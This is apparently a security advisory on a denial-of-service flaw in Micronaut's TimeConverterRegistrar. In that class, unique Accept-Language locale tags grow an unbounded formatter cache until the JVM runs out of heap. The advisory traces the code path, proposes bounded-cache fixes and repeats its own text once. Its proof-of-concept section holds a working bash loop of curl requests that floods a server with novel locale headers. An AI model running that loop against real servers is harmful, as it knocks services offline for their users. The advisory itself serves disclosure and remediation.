Summary
TimeConverterRegistrar caches DateTimeFormatter instances in an unbounded ConcurrentHashMap<String, DateTimeFormatter> whose key is derived from the @Format annotation pattern concatenated with the locale from the HTTP Accept-Language header. Because Locale.forLanguageTag() accepts arbitrary BCP 47 private-use extensions (en-x-a001, en-x-a002, …), an unauthenticated attacker can generate an unlimited number of unique cache keys by sending requests with novel locale tags, growing the cache until heap memory is exhausted and the JVM crashes. This is structurally identical to the recently patched GHSA-2hcp-gjrf-7fhc (DefaultHtmlErrorResponseBodyProvider), but TimeConverterRegistrar.formattersCache was not covered by that fix.
Details
The vulnerable cache is declared in context/src/main/java/io/micronaut/runtime/converters/time/TimeConverterRegistrar.java at line 123:
// TimeConverterRegistrar.java:123
private final Map<String, DateTimeFormatter> formattersCache = new ConcurrentHashMap<>();
The getFormatter method at line 434 inserts into this map with no eviction or size limit:
// TimeConverterRegistrar.java:434-443
private DateTimeFormatter getFormatter(String pattern, ConversionContext context) {
var key = pattern + context.getLocale(); // locale from Accept-Language header
var cachedFormatter = formattersCache.get(key);
if (cachedFormatter != null) {
return cachedFormatter;
}
var formatter = DateTimeFormatter.ofPattern(pattern, context.getLocale());
formattersCache.put(key, formatter); // NO SIZE CHECK — unbounded growth
return formatter;
}The attacker-controlled locale flows into the cache key through this call chain:
- HTTP header parsed —
HttpHeaders.findAcceptLanguage() at http/src/main/java/io/micronaut/http/HttpHeaders.java:766-771 calls Locale.forLanguageTag(part) directly on the raw Accept-Language value:
// HttpHeaders.java:766-771
default Optional<Locale> findAcceptLanguage() {
return findFirst(HttpHeaders.ACCEPT_LANGUAGE)
.map(text -> {
String part = HttpHeadersUtil.splitAcceptHeader(text);
return part == null ? Locale.getDefault() : Locale.forLanguageTag(part);
});
}
- Locale planted in ConversionContext —
AbstractRouteMatch.newContext() at router/src/main/java/io/micronaut/web/router/AbstractRouteMatch.java:373-378 passes the request locale into the conversion context for every route argument binding:
// AbstractRouteMatch.java:373-378
private <E> ArgumentConversionContext<E> newContext(Argument<E> argument, HttpRequest<?> request) {
return ConversionContext.of(
argument,
request.getLocale().orElse(null), // ← attacker-controlled via Accept-Language
request.getCharacterEncoding()
);
}
- Unbounded cache insert — When any temporal argument annotated with
@Format is bound, TimeConverterRegistrar.getFormatter(pattern, context) is called and inserts a new DateTimeFormatter for each unique pattern + locale key.
This path is triggered for any route endpoint with a @Format-annotated temporal parameter. This is an officially documented and commonly used Micronaut pattern, demonstrated in the framework's own test suite:
// test-suite/.../BindingController.java:105 (official Micronaut example)
@Get("/dateFormat")
public String dateFormat(@Format("dd/MM/yyyy hh:mm:ss a z") @Header ZonedDateTime date) {
return date.toString();
}TimeConverterRegistrar is an @Internal core bean registered unconditionally in every Micronaut application — it is not optional or user-configured. By contrast, the DefaultHtmlErrorResponseBodyProvider cache patched in GHSA-2hcp-gjrf-7fhc now uses a ConcurrentLinkedHashMap bounded at 100 entries; TimeConverterRegistrar.formattersCache remains an unbounded plain ConcurrentHashMap.
PoC
Against any Micronaut application exposing an endpoint with a @Format-annotated temporal parameter:
# Flood the formattersCache with unique locale-derived keys
for i in $(seq 1 200000); do
curl -s -o /dev/null \
-H "Accept-Language: en-x-$(printf '%06d' $i)" \
-H "date: 01/01/2024 12:00:00 AM UTC" \
"http://localhost:8080/dateFormat" &
# Throttle to avoid socket exhaustion
[ $((i % 500)) -eq 0 ] && wait
done
wait
# Server will throw OutOfMemoryError after enough unique locale entries accumulateEach request with a novel en-x-XXXXXX private-use tag inserts a new DateTimeFormatter entry into the unbounded map. Each DateTimeFormatter (with locale metadata) occupies roughly 2–10 KB on the heap. At 100,000 unique entries, the map alone can consume ~500 MB; at 500,000 entries the JVM typically crashes with OutOfMemoryError: Java heap space.
Impact
- An unauthenticated attacker can crash any Micronaut server that exposes at least one endpoint with a
@Format-annotated temporal type parameter — a documented, first-class framework feature.
- Memory grows linearly with the number of unique
Accept-Language values sent. The BCP 47 private-use namespace (en-x-ANYTHING) provides millions of distinct valid locale strings.
- No credentials, special permissions, or exploitation of application logic are required — only the ability to send HTTP requests with custom headers.
TimeConverterRegistrar is active in all Micronaut HTTP server applications by default; no special configuration is needed to be vulnerable.
Recommended Fix
Apply the same fix pattern used for GHSA-2hcp-gjrf-7fhc: replace the unbounded ConcurrentHashMap with a bounded ConcurrentLinkedHashMap:
// In TimeConverterRegistrar.java — replace line 123
import io.micronaut.core.util.clhm.ConcurrentLinkedHashMap;
private static final int MAX_FORMATTERS_CACHE_SIZE = 100;
private final Map<String, DateTimeFormatter> formattersCache =
new ConcurrentLinkedHashMap.Builder<String, DateTimeFormatter>()
.maximumWeightedCapacity(MAX_FORMATTERS_CACHE_SIZE)
.build();Alternatively, since @Format pattern values come from static annotations (a bounded, compile-time set), the locale should be excluded from the cache key and applied at use-time instead:
// In getFormatter() — cache only by pattern, apply locale at use-time
private DateTimeFormatter getFormatter(String pattern, ConversionContext context) {
DateTimeFormatter base = formattersCache.computeIfAbsent(
pattern, p -> DateTimeFormatter.ofPattern(p)
);
Locale locale = context.getLocale();
return locale != null ? base.withLocale(locale) : base;
}This second approach bounds the cache by the number of distinct @Format patterns in the application, which is always small and finite, fully eliminating the attack surface.
References
offset Reporter
Summary
TimeConverterRegistrarcachesDateTimeFormatterinstances in an unboundedConcurrentHashMap<String, DateTimeFormatter>whose key is derived from the@Formatannotation pattern concatenated with the locale from the HTTPAccept-Languageheader. BecauseLocale.forLanguageTag()accepts arbitrary BCP 47 private-use extensions (en-x-a001,en-x-a002, …), an unauthenticated attacker can generate an unlimited number of unique cache keys by sending requests with novel locale tags, growing the cache until heap memory is exhausted and the JVM crashes. This is structurally identical to the recently patched GHSA-2hcp-gjrf-7fhc (DefaultHtmlErrorResponseBodyProvider), butTimeConverterRegistrar.formattersCachewas not covered by that fix.Details
The vulnerable cache is declared in
context/src/main/java/io/micronaut/runtime/converters/time/TimeConverterRegistrar.javaat line 123:The
getFormattermethod at line 434 inserts into this map with no eviction or size limit:The attacker-controlled locale flows into the cache key through this call chain:
HttpHeaders.findAcceptLanguage()athttp/src/main/java/io/micronaut/http/HttpHeaders.java:766-771callsLocale.forLanguageTag(part)directly on the rawAccept-Languagevalue:AbstractRouteMatch.newContext()atrouter/src/main/java/io/micronaut/web/router/AbstractRouteMatch.java:373-378passes the request locale into the conversion context for every route argument binding:@Formatis bound,TimeConverterRegistrar.getFormatter(pattern, context)is called and inserts a newDateTimeFormatterfor each uniquepattern + localekey.This path is triggered for any route endpoint with a
@Format-annotated temporal parameter. This is an officially documented and commonly used Micronaut pattern, demonstrated in the framework's own test suite:TimeConverterRegistraris an@Internalcore bean registered unconditionally in every Micronaut application — it is not optional or user-configured. By contrast, theDefaultHtmlErrorResponseBodyProvidercache patched in GHSA-2hcp-gjrf-7fhc now uses aConcurrentLinkedHashMapbounded at 100 entries;TimeConverterRegistrar.formattersCacheremains an unbounded plainConcurrentHashMap.PoC
Against any Micronaut application exposing an endpoint with a
@Format-annotated temporal parameter:Each request with a novel
en-x-XXXXXXprivate-use tag inserts a newDateTimeFormatterentry into the unbounded map. EachDateTimeFormatter(with locale metadata) occupies roughly 2–10 KB on the heap. At 100,000 unique entries, the map alone can consume ~500 MB; at 500,000 entries the JVM typically crashes withOutOfMemoryError: Java heap space.Impact
@Format-annotated temporal type parameter — a documented, first-class framework feature.Accept-Languagevalues sent. The BCP 47 private-use namespace (en-x-ANYTHING) provides millions of distinct valid locale strings.TimeConverterRegistraris active in all Micronaut HTTP server applications by default; no special configuration is needed to be vulnerable.Recommended Fix
Apply the same fix pattern used for GHSA-2hcp-gjrf-7fhc: replace the unbounded
ConcurrentHashMapwith a boundedConcurrentLinkedHashMap:Alternatively, since
@Formatpattern values come from static annotations (a bounded, compile-time set), the locale should be excluded from the cache key and applied at use-time instead:This second approach bounds the cache by the number of distinct
@Formatpatterns in the application, which is always small and finite, fully eliminating the attack surface.References